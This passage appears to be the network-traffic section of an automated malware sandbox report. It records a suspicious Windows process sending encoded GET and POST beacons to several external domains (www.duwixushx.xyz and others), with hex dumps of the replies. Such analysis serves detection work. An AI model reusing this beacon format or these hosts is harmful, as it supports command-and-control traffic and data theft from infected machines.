                                                                                      Data Ascii: bbg=WekfKnjJCwpVfiwhdt3znoDJpFFxlTCwbsuK1Phcr/wQjF8TRq/DCoyQxZgyYhUIK6pUMzbrId9WBUdqeXJbGH8dhP3OEpRF7DESbxyXWJfvZ+N21vgmZe24xHZfpK3SUSl6VYNH6ApKoa7o7WD8rtiM8M+uJNr/n0FFOl1YSVZiu32W27xf/N1WiBUKgHwahIrzqlHHFSYDGN/5hcSELZg1PE3m4n4EeJbDkMxi0mA0029w9Fo+t7wx5CUHKU39zpli1lWW0t/VFdZJO4j5BHKOqE6OQP/BTVC3uVSbqoC3dlxPicS3TbZejiU8agmAe/bHOdLcxLaYVCe+t2+8WmTTWxkOLxC83/rm2nRrtlZ1R9j+uNpsVxU5alnFq82dJjBA0fz/yIxv1nd9MjDTQUa4g1SA8Aznf/4gCu6BYuAgLdYcnVsNauw6QLWng46g2TeuSBlMCQMUE9/Gl5BTANgUAm9GagrznBeVfFq2yBgI1AGVpELps5lGY/ZTLbrqD3vd0ZiJdXFtL+x8R1aF8sjmoofxzMTug2PhWoRjxDzq7AMS+dlk1zcJX+oNcwUXDelLviHtQmF0X5Gl2lPV0TaTa5Kg8RbKc+xZ8KK12JUd7ecMYskih8HW8xj9wWFDnrSUfZDSjUHZhSdl392hEJqupkJZUW1Wo2bQ7vgd9C24gxcZgVtU+jzm64NaTonthg+vTX553dSzRytYA54fjftBjVZ1K2884xEK7AeoUDsGkH26ml+32+X6S5VZG/YVZAZ+9A6VrXBTWrJ3qVXh6WVMSQ6wtXYZ6zyVgOXbgODeT4LULRkf0Odtiqpp1w6tMuXlZWARgtjbNtcMwzX5r8wghpTqnJyGO/F0gSvQcSAQXOEEgy5/QQp66uj/vTgkHiKSEZatQeMw2qpZ5CgcuMq1dBIoJ83t1fc63gpDMds/4cVm2POw3fYN2VMY9h2GkJ0mj9wwwp8324R2Q34N05dgAu3nJT6uFuy+bBWBaYoJKd4Y [TRUNCATED]
                                                                                      Jan 10, 2025 19:52:49.322103977 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.55000913.248.169.48804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:51.415097952 CET520OUTGET /4nyz/?bbg=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLcHkhoPHfVvEc20VtfW60da7XULV2w8gZY/6X5GlG7rybNg==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.snyp.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:52:54.928648949 CET387INHTTP/1.1 200 OK
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:52:54 GMT
                                                                                      content-length: 266
                                                                                      connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 62 67 3d 62 63 4d 2f 4a 51 2f 45 46 77 46 57 59 51 67 74 54 4f 4f 53 33 35 72 71 6f 46 4d 64 76 69 65 67 54 4a 4b 6d 78 49 70 4a 6f 66 68 46 6b 79 4a 4d 52 70 54 55 47 74 43 39 31 5a 55 50 5a 52 4d 62 55 62 4e 4b 58 42 65 48 41 70 4e 73 41 58 4a 2b 4f 48 74 4c 63 48 6b 68 6f 50 48 66 56 76 45 63 32 30 56 74 66 57 36 30 64 61 37 58 55 4c 56 32 77 38 67 5a 59 2f 36 58 35 47 6c 47 37 72 79 62 4e 67 3d 3d 26 34 48 70 68 3d 74 58 43 58 6b 70 4b 50 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bbg=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLcHkhoPHfVvEc20VtfW60da7XULV2w8gZY/6X5GlG7rybNg==&4Hph=tXCXkpKPT"}</script></head></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.550010156.251.17.224804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:00.328589916 CET780OUTPOST /u11p/ HTTP/1.1
                                                                                      Host: www.duwixushx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.duwixushx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.duwixushx.xyz/u11p/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 70 62 4a 4e 55 50 41 38 69 57 53 6a 70 37 65 34 49 46 71 45 58 75 6f 38 74 37 78 31 34 42 56 69 54 62 50 56 34 38 6c 64 54 77 49 35 6f 49 4d 4f 70 62 78 54 50 77 77 47 51 4e 51 77 6e 45 30 46 68 64 4e 4f 66 41 6f 48 78 34 42 48 44 39 77 67 6c 6f 37 6d 61 35 70 64 30 6a 39 61 4a 55 46 42 6e 72 41 45 36 59 58 78 48 48 4e 54 35 32 54 76 32 41 41 74 6c 73 56 6e 39 5a 4f 74 38 77 58 5a 37 69 72 76 35 30 6c 64 31 67 70 4e 66 70 34 52 42 2b 71 36 2b 53 54 54 55 73 34 54 34 73 39 59 51 31 56 6f 44 34 64 50 42 6f 52 73 34 71 69 63 4b 64 54 36 66 62 4a 67 55 47 51 39 38 37 49 57 30 5a 49 74 2f 36 77 3d
                                                                                      Data Ascii: bbg=pbJNUPA8iWSjp7e4IFqEXuo8t7x14BViTbPV48ldTwI5oIMOpbxTPwwGQNQwnE0FhdNOfAoHx4BHD9wglo7ma5pd0j9aJUFBnrAE6YXxHHNT52Tv2AAtlsVn9ZOt8wXZ7irv50ld1gpNfp4RB+q6+STTUs4T4s9YQ1VoD4dPBoRs4qicKdT6fbJgUGQ987IW0ZIt/6w=
                                                                                      Jan 10, 2025 19:53:01.207426071 CET691INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:01 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.550011156.251.17.224804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:02.876174927 CET800OUTPOST /u11p/ HTTP/1.1
                                                                                      Host: www.duwixushx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.duwixushx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.duwixushx.xyz/u11p/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 70 62 4a 4e 55 50 41 38 69 57 53 6a 70 61 75 34 4f 6d 43 45 56 4f 6f 37 6a 62 78 31 79 68 56 6d 54 61 7a 56 34 39 52 30 54 69 38 35 6f 74 77 4f 6e 35 56 54 43 51 77 47 59 74 51 78 6f 6b 31 4a 68 64 49 78 66 46 6f 48 78 34 46 48 44 35 30 67 69 5a 37 6c 63 35 70 54 76 54 39 59 4e 55 46 42 6e 72 41 45 36 63 2b 35 48 48 56 54 35 48 6a 76 33 6a 5a 66 6b 73 56 6b 36 5a 4f 74 34 77 58 46 37 69 72 64 35 77 46 37 31 6d 74 4e 66 74 6f 52 43 76 71 37 77 53 54 56 4c 38 35 4e 77 65 4d 57 4b 32 5a 6a 48 71 55 62 62 4a 35 4d 39 63 54 32 51 2f 62 53 4d 37 6c 59 45 56 59 4b 74 4c 70 2f 75 36 59 64 68 74 6c 6c 4a 58 6d 6f 53 70 44 42 56 7a 51 34 44 6e 5a 66 42 43 43 65
                                                                                      Data Ascii: bbg=pbJNUPA8iWSjpau4OmCEVOo7jbx1yhVmTazV49R0Ti85otwOn5VTCQwGYtQxok1JhdIxfFoHx4FHD50giZ7lc5pTvT9YNUFBnrAE6c+5HHVT5Hjv3jZfksVk6ZOt4wXF7ird5wF71mtNftoRCvq7wSTVL85NweMWK2ZjHqUbbJ5M9cT2Q/bSM7lYEVYKtLp/u6YdhtllJXmoSpDBVzQ4DnZfBCCe
                                                                                      Jan 10, 2025 19:53:03.758435011 CET691INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:03 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.550012156.251.17.224804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:05.425769091 CET1817OUTPOST /u11p/ HTTP/1.1
                                                                                      Host: www.duwixushx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.duwixushx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.duwixushx.xyz/u11p/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 70 62 4a 4e 55 50 41 38 69 57 53 6a 70 61 75 34 4f 6d 43 45 56 4f 6f 37 6a 62 78 31 79 68 56 6d 54 61 7a 56 34 39 52 30 54 69 6b 35 6f 66 49 4f 6e 5a 70 54 44 51 77 47 57 4e 51 38 6f 6b 30 54 68 64 77 39 66 46 73 58 78 36 4e 48 43 63 67 67 6a 72 54 6c 4a 4a 70 54 6e 7a 39 62 4a 55 45 44 6e 72 52 4e 36 59 53 35 48 48 56 54 35 45 37 76 6e 41 42 66 6d 73 56 6e 39 5a 4f 78 38 77 58 68 37 69 6a 6e 35 32 5a 72 31 57 4e 4e 59 4e 34 52 44 64 53 37 34 53 54 58 4b 38 35 46 77 65 41 64 4b 32 46 42 48 72 52 47 62 4b 70 4d 38 38 65 4f 44 4c 48 46 59 39 6c 4d 47 6c 38 75 77 76 78 4a 73 71 6b 46 68 2f 46 51 56 54 36 47 46 66 37 33 65 48 55 31 64 7a 77 49 50 48 48 67 4c 42 56 4c 38 4e 73 43 53 4b 73 4f 6a 50 45 5a 38 72 4a 71 47 32 35 46 34 6f 74 52 77 58 49 6e 6e 69 6b 38 5a 74 4b 74 6d 35 44 4c 64 39 39 6f 4a 56 4a 74 41 63 63 2b 68 50 61 6e 32 79 34 38 4c 6d 6f 6a 6b 67 33 45 4e 57 34 49 2f 42 52 52 4b 31 6c 33 75 4f 32 64 77 4b 6c 59 71 72 73 2b 62 78 46 6b 50 50 55 2f 72 51 64 73 46 34 51 74 43 51 [TRUNCATED]
                                                                                      Data Ascii: bbg=pbJNUPA8iWSjpau4OmCEVOo7jbx1yhVmTazV49R0Tik5ofIOnZpTDQwGWNQ8ok0Thdw9fFsXx6NHCcggjrTlJJpTnz9bJUEDnrRN6YS5HHVT5E7vnABfmsVn9ZOx8wXh7ijn52Zr1WNNYN4RDdS74STXK85FweAdK2FBHrRGbKpM88eODLHFY9lMGl8uwvxJsqkFh/FQVT6GFf73eHU1dzwIPHHgLBVL8NsCSKsOjPEZ8rJqG25F4otRwXInnik8ZtKtm5DLd99oJVJtAcc+hPan2y48Lmojkg3ENW4I/BRRK1l3uO2dwKlYqrs+bxFkPPU/rQdsF4QtCQpg+JqU0Gkip34UObz+X5UMBGZPWOFkFU1wzqg65h1LpA8Bk7a23KUUaqmUzIooC65ehomDpOBhOVKS0j+yx7Ow1SZwEOSy6yntct1wcJWHbQBXnKGN/4fPoeV2NU4URVkNr7KHX/NBnsnyItR4XNL/eEqfd2Kgr9K/mdrQI6GvUTiH47j1guLy+WbAJXJIlAMR0GqQYy4CM/P6GmKx5CaSoOuRhnLURO3YbkybnhMOwvnfUyVsdcdVsLnlnBSpdegWS7sZ0bxxHSvFcD6GiTDN6vN6eDatEZe//8cTDDKjmMrvytqm6mBLzDV10Sz/WAaxy2f/wK4G8vrjM5XCgzTmSSQZAtrZDFV9fa0DfOikiedGER+AmivbJ3ERkX8T3m18XVl6MHaj4VDGFGZfrpZR+DfR7TTJlsEMwBhy61ybSAN2WzGsTcJNp6FlhSHDu+hqt2d6NQETYwW7MWzB6odgv6f1x/DT57gLjACSgBnhW96N2KbyYEJS7Stidz16a8b1F89ZsQ0VdL2kKK8fn1iDLkojbtD269Q90xjFZIgPgM8dOnrLMT5LGV8UlJBLFNl3WbBlKcjdsjLEkfQr5F0UPsStAJ7D/bwIDU8xZu8ODeMOhIMF/ztbbZn5E6EJV8+xUWiXE6Yy5yGsqpbpEHo+n41K4ijTVQXF [TRUNCATED]
                                                                                      Jan 10, 2025 19:53:06.288997889 CET691INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:06 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.550013156.251.17.224804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:07.965236902 CET524OUTGET /u11p/?bbg=kZhtX7A2sH2Eo6iMIWGZUso0i5sc+RpFVMT48ed6Ly4yhf18n7pPOVMHRPIihFA/8qVQHA8l2MRLeM0A4ZXpHK5zp1AfcmEdh8Me18rVPXN1xmrP+jJ5uM9Xypqrvyuogg==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.duwixushx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:53:08.866660118 CET691INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:08 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.550015194.245.148.189804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:13.935770035 CET795OUTPOST /ib68/ HTTP/1.1
                                                                                      Host: www.maitreyatoys.world
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.maitreyatoys.world
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.maitreyatoys.world/ib68/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 6e 44 30 52 39 4b 4a 73 72 58 6a 35 4c 39 48 35 45 55 45 34 74 4d 62 54 66 58 79 45 31 7a 32 50 66 62 65 52 75 45 72 43 38 5a 44 4a 35 73 4b 6a 4b 30 38 4f 67 74 45 69 72 4e 2b 37 74 4f 59 30 42 6f 37 68 6c 57 61 4e 37 30 57 6e 76 5a 77 47 4d 31 65 6b 66 31 2f 34 59 50 62 30 78 6f 4e 65 6e 2b 6a 54 39 4a 66 58 56 46 6e 7a 62 43 53 34 77 2b 55 4b 76 77 74 69 56 2f 54 32 37 37 4a 4f 4d 36 68 34 71 44 64 6c 59 78 34 38 47 5a 5a 61 62 48 77 72 4b 73 4d 43 6a 31 39 67 70 35 61 42 78 4e 6a 35 53 35 79 34 6c 72 65 37 43 59 6a 33 4c 44 54 6d 56 55 4d 45 43 4f 39 77 79 79 50 37 66 52 66 2f 66 2f 38 3d
                                                                                      Data Ascii: bbg=nD0R9KJsrXj5L9H5EUE4tMbTfXyE1z2PfbeRuErC8ZDJ5sKjK08OgtEirN+7tOY0Bo7hlWaN70WnvZwGM1ekf1/4YPb0xoNen+jT9JfXVFnzbCS4w+UKvwtiV/T277JOM6h4qDdlYx48GZZabHwrKsMCj19gp5aBxNj5S5y4lre7CYj3LDTmVUMECO9wyyP7fRf/f/8=
                                                                                      Jan 10, 2025 19:53:14.544361115 CET725INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:14 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 